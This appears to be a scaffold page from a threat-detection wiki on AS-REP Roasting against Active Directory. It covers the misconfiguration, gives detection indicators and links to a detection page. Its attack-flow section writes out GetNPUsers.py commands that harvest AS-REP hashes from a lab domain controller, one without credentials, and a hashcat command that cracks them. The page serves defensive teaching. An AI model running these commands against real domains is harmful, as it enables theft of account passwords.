AS-REP Roasting
Status: Scaffold — content in progress
ATT&CK: T1558.004 — Steal or Forge Kerberos Tickets: AS-REP Roasting
Platforms: Windows (Active Directory)
Severity: High
What It Exploits
When a user account has "Do not require Kerberos pre-authentication" enabled (UAC flag DONT_REQ_PREAUTH), the KDC will return an AS-REP containing the TGT without verifying the requester knows the password. The AS-REP response is partially encrypted with the user's key — attackable offline.
Difference from Kerberoasting: No domain credentials required — can be done unauthenticated if you know the username.
Attack Flow
1. Enumerate accounts without pre-auth (requires domain auth):
GetNPUsers.py ITDR/ -usersfile users.txt -dc-ip 192.168.56.10
2. Or spray without authentication (need valid usernames):
GetNPUsers.py ITDR/ -no-pass -usersfile users.txt -dc-ip 192.168.56.10
3. Crack the AS-REP hash:
hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt
Behavioral Indicators
- 4768 events with
Pre-Authentication Type = 0(no pre-auth) - 4768 failures for enumeration attempts
- Requests from unusual sources for accounts that don't normally log in from that location
CTI Examples
Used as a standard technique in initial credential access, especially when combined with username enumeration from other sources (LinkedIn, email harvesting, previous breach data).
Evidence label: Reported | Confidence: Medium
Cross-Links
| Topic | Link |
|---|---|
| Kerberos Protocol | kerberos |
| Detection | detect-asrep-roasting |